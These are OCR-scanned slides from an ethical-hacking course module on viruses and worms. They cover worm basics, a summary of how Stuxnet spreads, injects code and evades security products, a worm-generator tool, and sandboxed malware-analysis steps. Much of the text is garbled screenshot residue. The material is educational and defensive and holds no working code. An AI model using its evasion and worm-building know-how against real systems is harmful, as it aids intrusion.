I uaar *ujeememe" . Qwwfy w* Crah Corrpa cho dart - V O x ra tftM cho dart %0>>cnMhbd cho dart \0 >xra d> bd cho Kart *\ Q aw *\bm cho Hart 0.' >K n + b m cho dart 0. ' >>craahbd cho dart % 0>xya^bd cho dart ~ X0crd3bd cho dart %0>>crad3bd cho dart '.0>>crahbd cho dart %0 a d ) bd cho dart ' .O xcra dib d cho dart cr a# bd cho dart %0 a s * bd cho dart a a bd cho dart %0>x7ad1bd cho dart X0>x7a*1 bd cho dart 0.* > x7a#1bd dart craihbai S w p Maua Buaona | Oange Uwr Paa o>d | Sp VWh MagBo a | OpfvO oe Itw f |
H d S a r*
H frV h a W a
| CaHuafibE*ncna| Vkj* Ud P* I
B m S d M n O ID i* I N d Doajnarts FoUar I
Oa>a H OocFtea
0 * * H Td Hm
% 0 1 % 0 * 1
O d d * % O o cu-rt | 0 4 4 F ia t**
0 d a rt "% 0 * Jy d 0 v % \A U T 0 6 X E C * A T
* lym tm w i |
p u g g J b o T
y * D 900^*co*H
M W b 0 yco w
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o d u l e
F l o w
C E H
V ir u s a n d W o rm s C o n c e p ts
T ypes of V iru s e s
I
C o u n te r m e a su re s M a lw a r e A n a ly s is
M o d u le F lo w
Prior to this, we have discussed various types of viruses. N ow we will discuss c om pute r w orm s and how they are different from viruses.
M a lw a r e Analysis
Types o f Viruses
Counterm ea sure s
< 4 /
V
C o m p u te r W o rm s
P e n e tratio n Testing
This section describes worms, w orm analysis (Stuxnet), and a w orm m aker (Internet W o rm M a k e r Thing).
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o m
p u t e r
o r m
C E H
Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction
Most of the worms are created only to replicate and spread across a network, consuming available computing resources; however, some worms carry a payload to damage the host system
Attackers use worm payload to install backdoors in infected computers, which turns them into zombies and creates botnet; these botnets can be used to carry further cyber attacks
0
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p u te r W o rm s
Com pu ter w orm s are m alicious program s that replicate, execute, and spread across netw ork connections inde pen dently, w ith o u t human interaction. M o st w orm s are created only to replicate and spread across a network, consuming available com puting resources; however, some w orm s carry a payload to dam age the host system. A w orm does not require a host to replicate, although in some cases one may argue that a w orm 's host is the m achine it has infected. W o rm s are a subtype of viruses. W o rm s were considered mainly a m ain fram e problem , but after most of the w orld's systems were in terconn ected, w orm s w ere targeted against the W in d o w s operating system, and were sent through email, IRC, and other netw ork functions. Attackers use w orm payloads to install backdoors in infected computers, which turns them into zo m bies and creates botnet; these botnets can be used to carry out further cyber-attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
H o w
I s
a W
o r m
D if f e r e n t f r o m
a V ir u s ?
H o w Is a W o rm D iffe re n t fro m
a V iru s?
Virus A virus is a file that cannot be spread to other com puters unless an infected file is replicated and actually sent to the other computer, whereas a w orm does just the opposite. Files such as .com, .exe, or .sys, or a com bination of them are corrupted once the virus runs on the system. Viruses are a lot harder to get off an infected machine. Their spreading options are much less than that of a w orm because viruses only infect files on the machine.
TABLE 7.1: Difference between Virus and Worms
W o rm A worm, after being installed on a system, can replicate itself and spread by using IRC, Outlook, or other applicable mailing programs. A w orm typically does not m odify any stored programs.
As com pared to a virus, a w orm can be easily rem oved from the system. They have m ore spreading options than a virus.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o r m
n a l y s i s :
S t u x n e t 0
0
0
Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power plant The goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers (PLCs) to operate as the attackers intend them to, most likely out o f their specified boundaries
1 2
S elf-re plicate s throu g h rem ovable d rive s e x p lo itin g a v u ln e ra b ility a llo w in g a uto -e xecu tion Updates its e lf throu g h a peer-to-peer mechanism w ith in a LAN
Spreads throu g h SMB by e x p lo itin g th e M icroso ft W ind ow s S erver Service RPC H andling Rem ote Code Execution V u ln e ra b ility Copies and executes its e lf on re m o te com puters throu g h n e tw o rk shares ru n n in g a WinCC database server Copies its e lf in to Step 7 p rojects in such a w ay th a t it a uto m a tica lly executes w h en th e Step 7 p ro je ct is loaded 8
Contacts a com m and and co n tro l se rver th a t a llo w s th e hacker to d o w n lo a d and execute code, in clu din g updated versions
10
Fingerprints a specific in du stria l co n tro l system and m o d ifie s code on th e Siem ens PLCs to p o te n tia lly sabotage th e system h ttp ://w w w .s y m a n te c .c o m
W o rm A n a ly s is : S tu x n e t
Source: http://w w w .svm antec.com Stuxnet is a com plex thre a t and m a lw a re with diverse m odules and functionalities. This is mostly used to grab the control and reprogram industrial control system s (ICS) by modifying code on pro g ra m m a b le logic controllers (PLCs), which create a way for the attacker to intrude into the com plete system and launch an attack by making changes in the code and take un a uthorize d control on the systems w ithou t the knowledge of the operators. Stuxnet contains many features such as: e Self-replicates through execution Q Q Spreads in a LAN through a vulnerability in the W in d o w s Print Spooler Spreads through S M B by exploiting the M icrosoft W in d o w s Server Service RPC Handling Remote Code Execution Vulnerability Copies and executes itself on rem ote com puters through netw ork shares running a W in CC database server rem ovable drives exploiting a vulnerability allowing auto-
Ethical Hacking and Countermeasures Copyright by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
Copies itself into Step 7 projects in such a way that it a u to m a tica lly executes w hen the Step 7 project is loaded
0 0 0
Updates itself through a peer-to-peer mechanism within a LAN Exploits a total of four unpatched M ic r o s o ft v u ln era bilities Contacts a com m and and control server that allows the hacker to dow nload and execute code, including updated versions
Contains a W in d o w s ro o tk it that hide its binaries and attem pts to bypass security products
Fingerprints a specific industrial control system and m odifies code on the Siemens PLCs to potentially sabotage the system
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o r m
n a l y s i s :
S t u x n e t (C ontd)
C E H
When injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process Whenever an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export Stuxnet hook Ntdll.dll to monitor for d B *! requests to load specially crafted file < names; these specially crafted filenames are mapped to another location instead - a location specified by W32.Stuxnet
Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypted configuration blocks The dropper component ofStuxnet is a wrapper program that contains all of the above components stored inside itself in a section name "stub" When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one of the exports
It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies that monitor LoadLibrary calls
W lH k tiH W
h ttp ://w w w .s y m a n te c .c o m
W o r m A n a l y s i s : S t u x n e t ( C o n t d )
Source: http://ww w.sym antec.com Stuxnet consists of a large .dll file that contains many different exports and resources and tw o encrypted configuration blocks. It hooks Ntdll.dll to m on itor for requests to load specially crafted filenames; these specially crafted filenam es are mapped to a nother location instead, a location specified by W32.Stuxnet. The dro pper co m p o n en t of Stuxnet is a w ra p p e r program that contains all com po nents stored inside itself in a section name "stub." W he n the threat is executed, the w ra ppe r extracts the .dll file from the stub section, maps it into m e m ory as a module, and calls one of the exports. W h e n e v e r an export is called, Stuxnet typically injects the entire DLL into another process and then just calls the particular export. W hen injecting into a trusted process, Stuxnet may keep the injected code in the trusted process or instruct the trusted process to inject the code into another currently running process. It uses a special m ethod designed to bypass behavior blocking and host intrusion-protection based technologies that m onitor Load Library calls.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o r m
n a l y s i s :
S t u x n e t (C ontd)
In je c t in S te p 7 & call e x p o r t 3 2
c d [U*4 H (crtifw a k M
Infects Step 7 projects
E H
Check CFG
A .................
I n f e c tio n R o u tin e F lo w
Hides malicious files
C re a te global m u te x e s
S et file tim e s * C re a te global m u te x D e cry pt resource 201 C r e a t e .p n f & cfe files & 242 & w r ite to disk V -------------------* ------------------Version OK D e cry pt & load self D a t e < 0 6 / 2 4 /2 0 1 2 fro m disk. Call e xp o rt C om pare ru nning version n u m b e r and version on disk
Exit
R o o tk it files > 1
M rx d s .s y s
M rx cls .sy s
6-
g e t version
h ttp ://w w w .s y m a n te c .c o m Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a l y s i s : S t u x n e t ( C o n t d )
Source: http://w w w .svm antec.com
In fe c tio n R o u tin e F lo w
Stuxnet checks if it has adm inistrator rights on the computer. Stuxnet wants to run with the highest privilege possible so that it has permission to take w h atever actions it likes on the computer. If it does not have Adm inistrato r rights, it executes one of the tw o zero-day escalation of privilege attacks described in the follow ing diagram. If the process already has the rights it requires, it proceeds to prepare to call export 16 in the main .dll file. It calls export 16 by using the injection techniques described in the Injection Technique section. W he n the process does not have adm inistrator rights on the system, it tries to attain these privileges by using one of tw o zero-day escalation of privilege attacks. The attack vector used is based on the operating system of the com prom ised computer. If the operating system is W in d o w s Vista, W in d o w s 7, or W in d o w s Server 2008 R2, the currently undisclosed Task Scheduler Escalation of Privilege vulnerability is exploited. If the operating system is W indow s XP, the currently undisclosed win32k.sys escalation of privilege vulnerability is exploited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
If exploited, both of these vulnerabilities result in the main .dll file running as a new process, either within the csrss.exe process in the case of the win32k.sys vulnerability or as a new task with adm inistrator rights in the case of the Task Scheduler vulnerability. The code to exploit the win32k.sys vulnerability is stored in resource 250. Details of the Win32k.sys Vulnerability and the Task Scheduler vulnerability currently are not released as patches are not yet available. After export 15 com pletes the required checks, export 16 is called. Export 16 is the main installer for Stuxnet. It checks the date and the version n um ber of the com prom ised computer; decrypts, creates, and installs the rootkit files and registry keys; injects itself into the services.exe process to infect rem ovable drives; injects itself into the Step7 process to infect all Step 7 projects; sets up the global mutexes that are used to com m unicate between different components; and connects to the RPC server. Export 16 first checks that the configuration data is valid, after that it checks the value "N T V D M TRACE" in the follow ing registry key: H K E Y _ L O C A L _ M A C H IN E \ S O F T W A R E \M ic ro s o ft\W in d o w s \ C u rre n tV e rs io n \ M S -D O S Emulation
( C o n t d)
Error
>
Equal
Check CFG
A......... < r~
< -----Reg key NTVDM Trace=19790529 Create global mutexes
Past deadline
Date<06/24/2012
^ Date OK
Check OS
XP or less Vista or higher
: : : y Set SACL
V Set DACL V
......... --------------A
V Create.pnf &
.cfg files
j. File OK
r>
Oem7a.pnf
Rootkit files
Date<06/24/2012
Decrypt & load self from disk. Call export 6 - get version
W o rm
M a k e r: In te rn e t W o rm C E H
M a k e r T h in g
Internet Worm Maker Thing Version 4.00: Public Edition
fC le n je ltv o sse
00 MM V Y
I D ra fc l:W ta fc rn sS earity
O R I- Dsabfe 51 0ez-rny C Random lyActivate =a>oads Chance of actovaTro p3/03d3: 1IN | W InduSe [C] Notce CHA NCE V r r I Dsobfc M5co Scanty DtditRuiCannd Dsabte Sh_:d:vwn Dssbte L 030
I -B lu eS c re e nO f
tnfectton O ptions:
I -U T sa lto 'W S r p r B o w ic
I- DkW ; WnfcMIWeb
r *Search Comard r 5 rux B norc
te
I- Loop S ound r HdeDedctop 1- DsaMe M alw are Rem ove 1- 3eatfe windows He FVatecton n Compt Antivirus r Change Com puter
In fe ctB a tF ies
O u tp u tP a th :
r Com pleTo E X E Support Screadlrg Options Startup:
1 CptrWaw
UR L:
r
r r r
-0
Icon:
M.te50e*rt
n
Patv
*
* 1 *
r Chonge Cn/e Icon CU.EXZ.KO: |c:\>vrdow:YJ01 |1 If You Ifced Tho Program Pietwe
r b'glA'tjrt1 4 >
German Startup
rD o o U lcK c s c c K
f OK^r PxptarM.x r C raw Reo O w ner Owner:
T el:
r W ctroP flider
I -------P C hancev/alpjpc
T w it( M a * 0 0 1 f lf ) i
/isI -
r S o a ^S tam p
r *end! Startup I Italan Stortjp
I------------------r ! rm ?_ J
l~ Keyboard DIko P Add To favorites
AafcOrllU: r
crj m o *u *
W o rm
M a k e r: In te rn e t W o rm
M a k e r T h in g
Internet W o rm M a k e r Thing is a tool specifically designed for generating a worm. These generated Internet w orm s try to spread over networks that are basically preset invasion proxy attacks that target the host technically, poison it, and make a base and plans to launch the attack in future. The w orm s work independently. An Internet w orm sends copies of itself via vulnerable com puters on the Internet.
Ethical Hacking and Countermeasures Copyright by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
r ^
dw
CfcMWf -nrdiii i S w i h f
- Owng N 0 0 Tt
1 1 r r * * Y IS o a J
I ---------r la pSLrt
B O m
'
A*vMadau<(ue
Om M Norton Saa**y
jw + tM **1r ta n Scr** o d r Q
ng*
F
rW hcttor*
EM UM
ff
r not M in e C C u k iU r t
r i * inr
r CualooiCadt
p Chr91C M P w l1>
r a 1M 1K g 1 s r 1a c j1iu 9u .11
r *H g gvM H
r K*kwlx rD am aF te r M>aa.* -
D l l E1E. ICO.
( E wMM*oi ( 5
r
r
r MrlMttraa
M d H C a ra n rlM n
C W y Ctoo [ . !
fou L*cdTho
T ft**S to rk
r fimwiUart
rm ^ u ld w i) .
PfO b
V t|fQA tX f c if
rS p an *S to rk
r Nndtnvks
r t d w s jr&
r r
r
^ _
Urrto*Dea
Add To F * n te
te n rid W im
rO trn g tT m m
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
o d u l e
F l o w
C E H
V ir u s a n d W o rm s C o n c e p ts
T ypes of V iru s e s
C o m p u te r W o rm s
C o u n te r m e a su re s
M o d u le F lo w
M a lw are analysis is defined as the action of taking m alware separately apart for studying it. It is usually perform ed for various reasons such as for finding the v u lne ra bilitie s that are exploited for spreading the malware, the inform ation that was stolen, and prevention techniques to be taken against it from entering the system or netw ork in future.
Types o f Viruses
Counterm ea su re s
4 s
C o m p u te r W o rm s
P e ne tratio n Testing
Detailed inform ation about the m alware analysis procedure is explained in the next few slides.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
h a t is
S h e e p
D ip
C o m p u t e r ?
C E H
(citifwd 1 tthKjl IlMkM
Sheep dipping refers to the analysis of suspect files, incoming messages, etc. for malware A sheep dip computer is installed with port monitors, file monitors, network monitors and antivirus software and connects to a network only under strictly controlled conditions
W h a t Is a S h e e p D ip C o m p u te r ?
malware. This "sheep dip p e d " c om pute r is isolated from other com puters on the netw ork to block any viruses from entering the system. Before this procedure is carried out, any dow nloaded programs are saved on external media such as CD -R O M s or flo p p y diskettes. A sheep dip com pu ter is installed with port monitors, files monitors, netw ork monitors, and antivirus softw are and connects to a netw ork only under strictly co n tro lle d conditions. A sheep dip computer: 0 0 0 0 Runs port and netw ork m onitors Runs user, group permission, and process m onitors Runs device driver and file m onitors Runs registry and kernel m onitors Sheep dipping refers to the analysis of suspect files, incom ing messages, etc. for
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A n ti- V ir u s
S e n s o r s
S y s t e m
C E H
B Anti-virus system is a collection of computer software that detects and analyzes malicious code threats such as viruses, worms, and Trojans. They are used a long with sheep dip computers
Network
Anti-Virus System
a * ......
System 1 System 2 Allowed Traffic Anti-Virus Anti-Spyware
a
System 3
Anti-Trojan
Anti-Spamware
Reflected ** Traffic
Internet
Anti-Phishing
EE
Email-Scanner
A n tiv iru s S e n so r S y s te m s
An antivirus system is a collection of c om pu te r software that detects and analyzes various m alicious code threats such as viruses, worms, and Trojans. They are used along with sheep dip computers.
N e tw o rk A n t i- V ir u s S y s te m
.....H
System2 1
Allowed Traffic Anti Virus Anti Spyware
System1
R e flecte d T ra ffic
Allowed Traffic
U
System 3
Anti Trojan
Anti Spamware
**
R e fle cte d
* * > T ra ffic
I n te r n e t
m
Anti-Phishing Email-Scanner
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
An antivirus system includes antivirus, anti-spyware, anti-Trojan, anti-spamware, anti-Phishing, an email scanner, and so on. Usually, it is placed in between the netw ork and Internet. It allows only genuine traffic to flow through the netw ork and blocks m alicious traffic from entering. As a result, it ensures n e tw o rk security.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
M a lw a r e
A n a ly s is
P r o c e d u r e : C E H
Copy the malware over to the guest OS
P r e p a r in g T e s tb e d
Isolate the system from the Disable the 'shared network by ensuring that the folders', and th e'guest NIC card is in "host only" mode isolation'
f c c a
0
Install guest OS into the Virtual PC/ VMWare Install VMWare or Virtual PC on the system
Copyright by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M a lw a re A n a ly s is P ro c e d u re : P re p a rin g T e s tb e d
M a lw are analysis provides in-depth understanding of each individual sample and identifies em erging technical trends from the large collections of m alware samples. The samples of m alware are mostly com patible with the W in d o w s binary executable. M a lw are analysis is conducted with a variety of goals. The follow ing is the procedure for m alware analysis preparing Testbed: 0 0 0 Install V M W a r e or Virtual PC on the system Install guest OS into the Virtual P C / V M W a r e Isolate the system from the netw ork by ensuring that the NIC card is in "host only" m ode 0 0 Disable the shared folders and the guest isolation Copy the m alware over to the guest OS
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
a l w a r e
A n a l y s i s
P r o c e d u r e
1. Perform static analysis when the malware is inactive 2. Collect information about:
0 String values found in the binary with the help of string extracting tools such as BinText e The packaging and compressing technique used with the help of compression and decompression tools such as UPX
B in T e x t
U PX
1 -1
Swxeh | F i* | Htto | P|?lOcan [C \U1tnVAdnwnfcfc1>D1klap\14up TnU>.on 0109 too T4*ia> 37310t* 0 1 1364GK|
Administrator: C:\Windows\system32\cmd.exe
D:sCEH T 00 1 3 \C E H v 8 M o d u le 07 U i r u s e s an d W o rn s s C o n p r e s s io n l\UPXNupx306#supx306t#>upx.exe U l t im a t e P a c k e r f u r e X e c u t a b le s C o p y r i if 111. <C> 1996 2011 IPX 3 .R *w M a rk u s O lie r liu m p . L a s z lo M o ln a r 0. J o h n R r I U sag e: u p x I I 2 3 4 5 6 7 * 9 d I t M il. 1 I - q o f k l -I *d -t -h -<j -o P IL k ~f -k F ile . . ly p e co n p re ss f a s t e r d e c o m p re s s t * s t c o n p r a t s i d f 11 g i v not h lp It q u l* t w r it o u tp u t t o 'P I L b ' f o r c e c o n p r o s c io n o f o u a p ic io u o { ko cp backup f i l o e x e c u t a b le s t o < de > con presa f o r n o r e d e t a i l e d h e lp . s it 1 1 t t p : / '/ u p x .3 f . 1 -0 f i l e ! P ile . . c o m p ra s s b e t t e r l i s t ro n p p n s s R d f i l e d i s p l a y u r n io n im n b d is p la y t o f t w M lie
fb w !
iN fw 1 01 t ^ t
dau
'1 1
a;;;;;
AC O O O O O O C O ttfi 0C0030001528 /. m nviH: OC003000IA44 /. n r h i i f : OC003000IA70 A XO XO O CCE9C OC0030001A3C A3 C O O C O O C C C C 3 A .O O O O O O C C C F O 0C0030001AFO a :coocaxtfiB OC003C1001B18
o c c o jo o m A C S
inm
L o w n o F lw R*pcrtnaflw
*up* - - h e l p '
h ttp : //w w w .m c a fe e .c o m
M a lw a re A n a ly s is P ro c e d u re
Step 1: Perform static analysis w hen the m alw are is inactive Step 2: Collect inform ation about: Q Q
h tp : //u p x .s o u r c e fo r g e .n e t
Copyright by EG-Goilicil. All Rights Reserved. Reproduction is Strictly Prohibited
String values found in the binary with the help of string extracting to o ls such as BinText The packaging and com pressing te ch n iq u e used with the help of com pression and decom pression tools such as U PX
B in T e x t
Source: h ttp://w w w .m cafee.com BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful inform ation for each item in the optional "advanced" view mode.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
BinText 3.0.3
Search | Filter | Help | File (0 scan |C:MJsers\Admntstrat0(\D esktopVsetip exe Time taken: 0.109 secs Mem pos 00003000004D 000030000110 000030000228 000030000250 000030000278 00003000029F 0000300012BE 00003000150C 000030001528 000030001A44 000030001A70 000030001A9C 000030001AC8 000030001AF0 000030001818 nnnn3nm1R44 Browse
0
A u
I? Advanced view File pos 00000000004D 000000000110 000000000228 000000000250 000000000278 00000000029F 0000000006BE 00000000090C 000000000928 O O O O O O O O O E44 000000000E70 O O O O O O O O O E9C O O O O O O O O O EC 8 000000000EF0 000000000F18 a nnnnnnnnnF44 <[ III
A A A A A A A A A A A A A A A
I
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 n
f Text
!This program cannot be run in DOS mode RicheWl text data rsc 0re(oc 0MZu3 IsProcessorFeaturePresent KRNEL32 Genetal.AppName Genal_Reportee FtesToOelete FiesToKeep LoggmgFlags RepottngFlags llinm w . h j
Ready
AN: 1840
UN 373
RS: 0
find |
Save |
UPX
Source: h ttp ://u p x .s o u rc e fo rg e .n e t
UPX achieves an excellent c om pre ssion ratio and offers very fast decom pression . It typically compresses better than WinZip/zip/gzip.
3S
Administrator: C:\Windows\system32\cmd.exe
D:\CEH-Tools\CEHv8 Module 07 Uiruses and W orm s\Compression and Decompress l\UPX\upx308w\upx308w>upx.exe Ultimate Packer for eXecutables Copyright <C > 1996 - 2011 JPX 3.08w Markus Oberhumer, Laszlo Molnar 8 r John Reiser Dec 12th Jsage: upx [123456789dlthUL] l-qvfk] 1-0 file] f ile .. Commands: -1 compress faster -9 compress better -d decompress 1 list compressed file -t test compressed file -U display version number -h give more help -L display software license Options: -q be quiet -w be verbose - 0FILE write output to 'FILE' -f force compression of suspicious files -k keep backup files File.. executables to <de>compress rype 'upx help' for more detailed help. JPX comes with A B SO L U T E L YN OW A R R A N T Y ; for details visit http://upx.sf.ne D:\CEH-Tools\CEHv8 Module 07 Uiruses and W orm s\Compression and Decompress l\UPX\upx308w\upx308w>
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
a l w a r e
A n a l y s i s
P r o c e d u r e (C ontd)
C E H
Urt1fw4 ilh iu l lUthM
3. Set up network connection and check that it is not giving any errors
r > n
t o
Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer
L ilJ
Detail SyncType SyncTy Deswed Access: S Offset: 7.623.168. Offset: 7.557.632. Offset: 7.574.016.. Length 1. seqnum Length 1. startime Offset: 9.322.496. Offset: 9.547.776. Offset: 9.535.483. Offset: 7.803.392.
tf U I
Tme o f Day Process Name
]
PID Operation 2384 CreateFieMapp 2384 CloseFie CreateFie ReadFie ReadFJe ReadFie ,TCP Receive ,TCP Send ReadFie ReadFie ReadFie ReadFie Path Resut C \Wndows\System32'wnageres <* SUCCESS C \ Windows\System32N *T1agere3 dl SUCCESS C \Lbers\Admostrator\^pp Data\Local\... SUCCESS C \Window\Mcro*oft NETXFramework... SUCCESS C \Wind0 ws\Wcf0 s0 ft NETXFramework... SUCCESS C\Windows\f*crosoft.NETXFramework... SUCCESS WIN-MSSELCK4K41 1056 >WIN-MSS. SUCCESS WIN-MSSELCK4K41:1055 > WIN-MSS. SUCCESS C\Windows\Hcro soft. NETXFramevvork.. SUCCESS C XWWowsXKIcroscft NETXFramework .. SUCCESS C XWindowsXMcrosoft NETXFramework... SUCCESS CXWindowsXfAcrosoft.NETXFramework... SUCCESS
P ro cess M o n ito r
. 1
M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t d )
Step 3: Set up n e tw o rk con nectio n and check that it is not giving any errors Step 4: Run the virus and m onitor the process actions and system inform ation with the help of process m onitoring tools such as Process M o n it o r and Process Explorer
m
l^ _
P ro c e s s M o n ito r
Source: http://technet.m icrosoft.com
Process M o n ito r is an advanced m o n ito rin g to o l for W in d o w s that shows real-time file system, registry, and p ro cess/thread activity.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
&
Time of Day 12:13:46.620... 12:13:46.620... 12:13:46.621. .. 12:13:46.676... 12:13:46.677... 12:13:46.679... 12:13:46.685... 12:13:46 685. 12:13:46.687... 12:13:46.694... 12:13:46.695... 12:13:46.696...
n n
Process Name PID Operation Path Result Detail ExplorerEXE2384 2 k Create FileMapp. C:\Windows\System32\imageres.dllSUCCESS SyncType: SyncTy.. ^ ExplorerEXE 2384 ;rk Close File C:\W1ndows\System32\imageres.dll SUCCESS ^Explorer.EXE 2384 ; A Create File C:\Users\Administrator\AppData\Local\...SUCCESS Desired Access: S... 52mmc.exe 4100 Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 7.623.168,.. j a mmc.exe 4100 2 k Read File C:\Windows\MicrosoftNET\Framewo1k.SUCCESS Offset: 7,557,632.... Smmc.exe 4100 2 k Read File C:\Windows\Microsoft.NET\Framework. ..SUCCESS Offset: 7.574,016,.. ttfirefox.exe 2760 TCP Receive WIN-MSSELCK4K41:1056->WIN-MSS...SUCCESS Length: 1. seqnum:. (Jfirefox.exe 2760 TCP Send WIN-MSSELCK4K41:1055 >WIN-MSS...SUCCESS Length: 1. startime:.. jqjmmc.exe 4100 Read File C:\Windows\Microsoft.NEP\Framework... SUCCESS Offset: 9,322,496,.. Btmmcexe 4100 Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 9,547.776,... jgjmmc.exe 4100 2 k Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 9,535,488,.. ^m m c.exe 4100 irk Read File C:\Windows\Microsoft.NET\Framework... SUCCESS Offset: 7,803,392...
ir i n u t __ 1 ____ 1 1 1 n >11n r
1 r r i v ___i i n n T 3 n
1r v ? c g 1r _ a g __ ! T m i i n _ _
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
a l w a r e
A n a l y s i s
P r o c e d u r e (C ontd)
N e tR e s id e n t
( |
^ H
(rtifW d tth.ul N m Iw (
5. Record network traffic information using the connectivity and log packet content monitoring tools such as NetResident and TCPView 6. Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot
He sear* ve* Evens rods -ep AlDab | Cr04>5 * &0-p = E 1Q/V2012 S siotoefc 0 '* ffl 0 i *artyA S 0 *art* B Rdrea Fte OM j>*aJ-ess S3ve ^ Dees Event Octal =totocd ^,Web WWeb Web Web web >y,Web ^ Web ^ Web ^ Web ^ web Web Web ^W eb W teb Party A I Pot! A 1076 WM-LXQN3... VV1N-IXQN3... 1104 WIH-LXQN3... 1109 WW-IXQN3 1110 W1H-LXQN3... 1111 W 1N-LXQN3 1114 1114 W1H1XQN3... \V1N-LXCN3 1145 VV1N-IW 3N3 1147 WIN-LKQN3... 1163 W 1N-LXQN3... 1114 W1N-UQN3... 1164 W 1N4.XQN3... 1076 W1N-IXQN3 1205 5arty B mystaft-bni... m5003sM-n... maa03s&4-n... maa03s04-n... ra303s:-4*v.. m aa03e04-n1 no30 si> 4 -tv.. rnaa03st>4-n... nao03*&4-n... nas03;-4 n... m*i03*&4n... moo03*04-n... mvctrt*xU... 0&4^... Po:B 80 443 *43 *43 443 90 . 80 80 443 443 B C 80 8C 80
LastLpdated Date KV5/2012 2::. 1 :0/5/3012 2:14:3. 36 !(VS/2012 2:1.. 10/5/20122:1^:4.. :0/5/2012 2:1 10/5/2012 2:14:4. 1 36 - 10/5/2012 2:1.. 10/5/2012 2:14:4. 1 - 10/5/2012 2:1.. 10/5/2012 2:14:4.. 20 10/5/20122:1 10/5/2012 2:14:5. - 10/5/2012 2:1.. 10/5/20122:14:5.. 10/5/2012 2:1 10/5/2012 2:14:5. - 10/5/2012 2:1. 10/5/3012 2:14:5. 10/5/2012 2:1.. 10/5/2012 2:14:$.. 10/5/3012 2:1 10/5/2012 2:14:5. - 10/5/2012 2 :1 10/5/2012 2:14:5. 10*5/2012 2:1. 10/5/2012 2:15:0. - 10/5/2012 2:1 10/5/3012 3: t5:3.
rvralDH^
T O . ..
P O S 1re q u e s t t0h ttp e //n e w t400ate-a un /n cw s/xhr/rhc/M tlM M cr1 T n g V n lu 4 52777990230736.52777991632076.52777992527295.5277798-180851-1.52777983170746 527779 M394614 C M
M a l w a r e A n a l y s i s P r o c e d u r e ( C o n t d )
Step 5: Record n e tw o rk traffic in fo rm a tio n using connectivity and log packet content m onitoring tools such as N e tR e side nt and T C P V iew Step 6: D eterm ine the files added, processes spawned, and changes to the registry with the help of registry m onitoring tools such as RegShot
N e tR e sid e n t
Source: http://w w w .tam os.com
NetResident is a netw ork content analysis a pplication designed to m onitor, store, and reconstruct a w ide range of netw ork events and activities, such as email messages, w eb pages, dow nloaded files, instant messages, and VoIP conversations. It uses advanced m o n ito rin g te ch n o lo g y to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
N e t R e s i d e n t - E v a l u a ti o n V e r s io n
. n x
Refresh | y
Fiter - I Count 1 36 1 36 1 20
IP Address * | , Date u 10/5/2012 2:1... u 10/5/2012 2:1... 10/5/2012 2:1... a 10/5/2012 2: L .. 10/5/2012 2:1... a 10/5/2012 2:1... Q 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... o 10/5/2012 2:1... a 10/5/2012 2:1... a 10/5/2012 2:1... 10/5/2012 2:1... <1
Save * ^
